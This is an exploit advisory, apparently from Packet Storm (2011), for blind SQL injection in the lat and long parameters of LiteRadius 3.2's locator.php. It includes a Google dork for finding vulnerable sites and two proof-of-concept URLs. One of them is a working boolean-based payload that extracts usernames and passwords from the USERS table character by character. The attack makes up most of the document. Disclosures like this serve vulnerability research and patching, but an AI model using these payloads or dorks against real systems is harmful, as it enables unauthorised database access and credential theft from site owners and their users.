LiteRadius 3.2 Blind SQL Injection

2011-07-13T00:00:00
ID PACKETSTORM:103018
Type packetstorm
Reporter Robert Cooper
Modified 2011-07-13T00:00:00

Description

                                        
                                            `# Exploit Title: LiteRadius <= 3.2 - Multiple Blind SQL Injection vulnerabilities  
# Google Dork: allinurl: locator.php?long=  
# Date: 7/12/2011  
# Author: Robert Cooper (admin[at]websiteauditing.org)  
# Software Link: http://www.escaperadius.com/er/products/literadius/lr.php  
# Tested on: [Linux/Windows 7]  
#Vulnerable Parameters: lat=, long=  
  
##############################################################  
PoC:  
  
http://domain.com/dealer/locator.php?parsed_page=1&lat=25.4405436315&long=132.710253334'  
http://domain.com/dealer/locator.php?parsed_page=1&lat=25.4405436315&long=132.710253334 and ascii(substring((SELECT concat(username,0x3a,password,0x3a,0x0a) FROM USERS limit 0,1),1,1))>80  
  
  
##############################################################  
www.websiteauditing.org  
www.areyousecure.net  
  
# Shouts to the Belegit crew  
  
`